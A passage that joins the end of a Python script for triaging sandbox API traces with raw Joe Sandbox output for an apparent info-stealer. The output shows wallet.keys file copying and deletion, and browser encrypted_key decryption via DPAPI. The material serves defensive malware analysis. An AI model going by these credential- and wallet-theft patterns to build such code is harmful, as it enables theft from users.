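    subcall_of: Optional[int]  # callee address when the line is "Part of subcall function"


def parse_trace(text: str) -> list:
    """Split the trace into functions (one per 'APIs' header), each a list of Calls."""
    groups = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            groups.append([])
            continue
        m = CALL_RE.match(line)
        if not m or not groups:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        groups[-1].append(Call(m["func"], m["mod"], args, int(m["ref"], 16),
                               int(m["sub"], 16) if m["sub"] else None))
    return groups


def hex_arg(arg: str) -> Optional[int]:
    """Resolved DWORD arguments print as 8 hex digits; anything else is a string or '?'."""
    return int(arg, 16) if HEX_RE.fullmatch(arg) else None


def decode_reg_open(call: Call) -> dict:
    """Decode RegOpenKeyEx(hKey, lpSubKey, ulOptions, samDesired, phkResult)."""
    assert call.func.startswith("RegOpenKeyEx"), call.func
    root, access = hex_arg(call.args[0]), hex_arg(call.args[3])
    rights = [name for bit, name in KEY_RIGHTS if access is not None and access & bit]
    return {"root": HKEY_ROOTS.get(root, f"handle {call.args[0]}"),
            "access": access, "rights": rights,
            "key_read": access is not None and access & KEY_READ == KEY_READ,
            # 32-bit code asking for the native 64-bit view instead of WOW6432Node.
            "wow64_64key": bool(access and access & 0x0100)}


def classify(calls: list) -> set:
    """Tag one function by its call pattern (tag names are this example's assumptions)."""
    names = [c.func for c in calls]
    strings = [a for c in calls for a in c.args if a != "?" and hex_arg(a) is None]
    tags = set()
    if "RegOpenKeyExA" in names and "RegQueryValueExA" in names:
        tags.add("registry-read")
    if "CopyFileA" in names and "DeleteFileA" in names \
            and names.index("CopyFileA") < names.index("DeleteFileA"):
        tags.add("copy-then-delete")  # stage a copy, consume it, remove the trace
        if any("wallet" in s.lower() for s in strings):
            tags.add("wallet-file-reference")
    if {"GetProcessHeap", "RtlAllocateHeap"} <= set(names) \
            and any(n.startswith("wsprintf") for n in names):
        tags.add("heap-format-string")  # allocate, then format into the fresh buffer
    return tags


if __name__ == "__main__":
    for calls in parse_trace(SAMPLE_TRACE):
        first = next((c.ref for c in calls if c.subcall_of is None), calls[0].ref)
        print(f"function @ {first:08X}: {sorted(classify(calls))}")
        for c in calls:
            if c.func.startswith("RegOpenKeyEx"):
                print("   ", decode_reg_open(c))
```

Paste further APIs blocks from the saved report into SAMPLE_TRACE (or read them from a file) to triage a whole function list at once. The decoded samDesired mask is the field worth checking by hand: a 32-bit sample that requests KEY_WOW64_64KEY is reading the native 64-bit hive, which tells you which HKLM\SOFTWARE subtree the queried values actually come from.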
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032D481
                              • lstrlen.KERNEL32(00000000), ref: 0032D698
                              • lstrlen.KERNEL32(00000000), ref: 0032D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 0032D72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 65771bdc68a9187a9caf85218a5d06b86623833c1d18410fd7d65b7bdd2cebab
                              • Instruction ID: f210b454b82064497510ed28b199a431e762f0733be16bba8ea34e94751724f1
                              • Opcode Fuzzy Hash: 65771bdc68a9187a9caf85218a5d06b86623833c1d18410fd7d65b7bdd2cebab
                              • Instruction Fuzzy Hash: 8D910E72910508ABCB06FBA4DCD6EEE7738AF14300F504168F547BE091EF746A49DB62
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 00338B60: GetSystemTime.KERNEL32(00340E1A,0109A450,003405AE,?,?,003213F9,?,0000001A,00340E1A,00000000,?,01099048,?,\Monero\wallet.keys,00340E17), ref: 00338B86
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0032D801
                              • lstrlen.KERNEL32(00000000), ref: 0032D99F
                              • lstrlen.KERNEL32(00000000), ref: 0032D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 0032DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 490a6fb5d1d45df01944b2a0ba60d43bcd84006fada8657b0666d610b3e3c613
                              • Instruction ID: 0ee7f110fc1197604ed7b130c87ef1c6a63b1c5fd32fa6fecbaeef13641a8dfe
                              • Opcode Fuzzy Hash: 490a6fb5d1d45df01944b2a0ba60d43bcd84006fada8657b0666d610b3e3c613
                              • Instruction Fuzzy Hash: E0810D72910508ABCB06FBA4DCD6EEE7738AF14300F504128F547BE091EF746A49DBA2
                              APIs
                                • Part of subcall function 0033A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0033A7E6
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                                • Part of subcall function 0033A920: lstrcpy.KERNEL32(00000000,?), ref: 0033A972
                                • Part of subcall function 0033A920: lstrcat.KERNEL32(00000000), ref: 0033A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00341580,00340D92), ref: 0032F54C
                              • lstrlen.KERNEL32(00000000), ref: 0032F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: 0b3e4ebcccaa6cf2c8a17bd46dc13f1a227ad49d5c144666d8e60586ceee980e
                              • Instruction ID: 383a80869a6bdeaf0905d6f5a80b437f75612f318d2bd86adb0fc163e2b70593
                              • Opcode Fuzzy Hash: 0b3e4ebcccaa6cf2c8a17bd46dc13f1a227ad49d5c144666d8e60586ceee980e
                              • Instruction Fuzzy Hash: EC510171D10608AADB06FBB4DCD6DED7778AF54300F408528F8566F191EF346A09DBA2
                              Strings
                              • s3, xrefs: 003372AE, 00337179, 0033717C
                              • s3, xrefs: 00337111
                              • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0033718C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: s3$s3$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 3722407311-3620656206
                              • Opcode ID: b09871c626b5a98c09e976e967e86f43522dd4a8b6740f543595486084c4c82d
                              • Instruction ID: 6c5101aaded8a9ecab0c30cecc3f5ce64e418130ca1cf7ccce1b6e37bf5654fa
                              • Opcode Fuzzy Hash: b09871c626b5a98c09e976e967e86f43522dd4a8b6740f543595486084c4c82d
                              • Instruction Fuzzy Hash: DB519EB1D04218ABDB25EB90DCD5BEEB3B4EF54304F1044A8E215BB181EB746E88DF59
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 1b340eb11fe805144915acccf629cc0d207e54fb5a7b957917a2117a676f179b
                              • Instruction ID: 8f7b58763985150b4b71c3203516cc79a1020a1717b92fe4722c6a84a7197fc2
                              • Opcode Fuzzy Hash: 1b340eb11fe805144915acccf629cc0d207e54fb5a7b957917a2117a676f179b
                              • Instruction Fuzzy Hash: B84121B1D10109AFCB05EFE4D8C6AEEB7B8AF54304F008418F5167B251DB75AA49DFA2
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                                • Part of subcall function 003299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003299EC
                                • Part of subcall function 003299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00329A11
                                • Part of subcall function 003299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00329A31
                                • Part of subcall function 003299C0: ReadFile.KERNEL32(000000FF,?,00000000,0032148F,00000000), ref: 00329A5A
                                • Part of subcall function 003299C0: LocalFree.KERNEL32(0032148F), ref: 00329A90
                                • Part of subcall function 003299C0: CloseHandle.KERNEL32(000000FF), ref: 00329A9A
                                • Part of subcall function 00338E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00338E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00329D39
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329AEF
                                • Part of subcall function 00329AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00324EEE,00000000,?), ref: 00329B01
                                • Part of subcall function 00329AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N2,00000000,00000000), ref: 00329B2A
                                • Part of subcall function 00329AC0: LocalFree.KERNEL32(?,?,?,?,00324EEE,00000000,?), ref: 00329B3F
                                • Part of subcall function 00329B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00329B84
                                • Part of subcall function 00329B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00329BA3
                                • Part of subcall function 00329B60: LocalFree.KERNEL32(?), ref: 00329BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: bf6ce8762bb29f74acd6091b32148660bc78b27af8cded630955726e9301527d
                              • Instruction ID: 8c41752e6675bbbb1366c212a54cd18442d05362d3d024e6cb01e20046bdb73d
                              • Opcode Fuzzy Hash: bf6ce8762bb29f74acd6091b32148660bc78b27af8cded630955726e9301527d
                              • Instruction Fuzzy Hash: D9312DB6D10219ABCF05DFE4EC85BEFB7B8AF48304F144519E905AB241EB749A44CBA1
                              APIs
                                • Part of subcall function 0033A740: lstrcpy.KERNEL32(00340E17,00000000), ref: 0033A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003405B7), ref: 003386CA
                              • Process32First.KERNEL32(?,00000128), ref: 003386DE
                              • Process32Next.KERNEL32(?,00000128), ref: 003386F3
                                • Part of subcall function 0033A9B0: lstrlen.KERNEL32(?,01099048,?,\Monero\wallet.keys,00340E17), ref: 0033A9C5
                                • Part of subcall function 0033A9B0: lstrcpy.KERNEL32(00000000), ref: 0033AA04
                                • Part of subcall function 0033A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0033AA12
                                • Part of subcall function 0033A8A0: lstrcpy.KERNEL32(?,00340E17), ref: 0033A905
                              • CloseHandle.KERNEL32(?), ref: 00338761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 7f800a377480978e1f402355e530103801a786b4b4b68ae14bac8b4b7496526e
                              • Instruction ID: e3872019d27e361dd03ee3f5e6f42023bb212e936d198c084b9d963d8cd24f4e
                              • Opcode Fuzzy Hash: 7f800a377480978e1f402355e530103801a786b4b4b68ae14bac8b4b7496526e
                              • Instruction Fuzzy Hash: 75314B71901618ABCB26DF94DC85FEEB7B8EF45700F104199F10ABA1A0DF746A45CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00340E00,00000000,?), ref: 003379B0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003379B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00340E00,00000000,?), ref: 003379C4
                              • wsprintfA.USER32 ref: 003379F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: fca16f3024e520496eb1b6f2243dd7a77885cef7d308009686b9146d6ec89fb1
                              • Instruction ID: c76760fde2c58c699843d09f0734434d631e9f4f69078a9b0da07666eb052add
                              • Opcode Fuzzy Hash: fca16f3024e520496eb1b6f2243dd7a77885cef7d308009686b9146d6ec89fb1
                              • Instruction Fuzzy Hash: E91127B2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AF605A3280E2795944DBB1
                              APIs
                              • __getptd.LIBCMT ref: 0033C74E
                                • Part of subcall function 0033BF9F: __amsg_exit.LIBCMT ref: 0033BFAF
                              • __getptd.LIBCMT ref: 0033C765
                              • __amsg_exit.LIBCMT ref: 0033C773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0033C797
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: f54b38eb2b80e83ac15594c852c347a531e50a9da5b56ceb3b74ef9365ed883a
                              • Instruction ID: b3f6a5398e2e0c14e11de05395408134b82093d749702d650594f170711a01eb
                              • Opcode Fuzzy Hash: f54b38eb2b80e83ac15594c852c347a531e50a9da5b56ceb3b74ef9365ed883a
                              • Instruction Fuzzy Hash: BAF0BE329147009FD723BBB89CC7B5EB3A06F00721F255249FA04BE2D2CF6469419F56
                              APIs
                                • Part of subcall function 00338DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00338E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00334F7A
                              • lstrcat.KERNEL32(?,00341070), ref: 00334F97
                              • lstrcat.KERNEL32(?,01098F88), ref: 00334FAB
                              • lstrcat.KERNEL32(?,00341074), ref: 00334FBD
                                • Part of subcall function 00334910: wsprintfA.USER32 ref: 0033492C
                                • Part of subcall function 00334910: FindFirstFileA.KERNEL32(?,?), ref: 00334943
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FDC), ref: 00334971
                                • Part of subcall function 00334910: StrCmpCA.SHLWAPI(?,00340FE0), ref: 00334987
                                • Part of subcall function 00334910: FindNextFileA.KERNEL32(000000FF,?), ref: 00334B7D
                                • Part of subcall function 00334910: FindClose.KERNEL32(000000FF), ref: 00334B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.1734754441.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000000.00000002.1734730369.0000000000320000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003D1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.00000000003DD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.0000000000402000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1734754441.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000006FE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007D8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.00000000007FB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000802000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735090731.0000000000811000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735549081.0000000000812000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735665978.00000000009A6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1735682673.00000000009A7000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_320000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 575189ada6295b5f34e97904c2d80ea0d13f83e33fcc837a0749706005263a0d
                              • Instruction ID: 800e5c04521f933c575b655780f708a1aa184c3760f70e34183c186708ab0998
                              • Opcode Fuzzy Hash: 575189ada6295b5f34e97904c2d80ea0d13f83e33fcc837a0749706005263a0d
                              • Instruction Fuzzy Hash: EB219B7690020467C755F774EC86EED337CAB64300F004554F65AAB181EEB5A6CD9F92